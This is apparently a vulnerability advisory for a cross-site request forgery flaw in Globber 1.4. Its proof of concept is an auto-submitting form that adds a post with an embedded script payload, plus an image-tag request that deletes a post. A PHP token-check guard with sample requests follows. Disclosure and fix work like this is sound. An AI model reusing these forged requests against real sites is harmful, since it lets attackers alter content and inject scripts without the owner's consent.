
Globber 1.4 Cross-site Request Forgery

A cross-site request forgery (CSRF) vulnerability in Globber can be exploited
to add and delete blog posts.

PoC

<!-- Add (note that blog also must be "rebuilt") -->
<html>
<body onload="document.forms[0].submit()">
<form method="POST" action="http://localhost/globber/admin.php?task=edit&c=Misc&a=new-article">
<input type="hidden" name="title" value="New Article" />
<input type="hidden" name="date" value="06-07-2010 10:16 pm" />
<input type="hidden" name="tags" value="" />
<input type="hidden" name="content" value="&lt;script&gt;alert(0)&lt;/script&gt;" />
</form>
</body>
</html>

<!-- Delete -->
<html>
<body>
<img src="http://localhost/globber/admin.php?task=articles&delc=Misc&dela=first-post" />
</body>
</html>
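
One way to close both request paths shown in the PoC, as an added example rather than Globber's own code: a guard that admin.php could call before acting on a request. The function names, the `csrf` form field and the session key are assumptions; only `task`, `delc` and `dela` come from the PoC, and the sample requests are constructed.

```php
<?php
// Added example: hypothetical guard, not Globber's code. Field and key names are assumed.

/** Create (once per session) and return the token to embed in every admin form. */
function csrf_token(array &$session): string
{
    if (empty($session['csrf'])) {
        $session['csrf'] = bin2hex(random_bytes(32));
    }
    return $session['csrf'];
}

/** Return null when the request may proceed, or a short rejection reason. */
function csrf_reject_reason(string $method, array $get, array $post, array $session): ?string
{
    // Any POST, or any request carrying the delete parameters, changes state.
    $changesState = $method === 'POST' || isset($get['delc']) || isset($get['dela']);
    if (!$changesState) {
        return null; // plain page view
    }
    if ($method !== 'POST') {
        return 'state change over ' . $method; // image-tag style delete request
    }
    $sent  = $post['csrf'] ?? '';
    $known = $session['csrf'] ?? '';
    if (!is_string($sent) || $known === '' || !hash_equals($known, $sent)) {
        return 'missing or wrong token'; // auto-submitted cross-site form
    }
    return null;
}

// Constructed requests: the two PoC shapes plus two legitimate ones.
$session = [];
$token = csrf_token($session);
$edit = ['task' => 'edit', 'c' => 'Misc', 'a' => 'new-article'];
$cases = [
    'forged add'    => ['POST', $edit, ['title' => 'New Article']],
    'forged delete' => ['GET', ['task' => 'articles', 'delc' => 'Misc', 'dela' => 'first-post'], []],
    'real add'      => ['POST', $edit, ['title' => 'Hello', 'csrf' => $token]],
    'list articles' => ['GET', ['task' => 'articles'], []],
];
foreach ($cases as $name => [$method, $get, $post]) {
    $reason = csrf_reject_reason($method, $get, $post, $session);
    echo str_pad($name, 14), $reason === null ? 'allowed' : "rejected ($reason)", PHP_EOL;
}
```

With a guard like this in place, delete links in the admin interface would have to become POST forms that carry the token.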


This post first appeared on XSS - Cross-Site Scripting.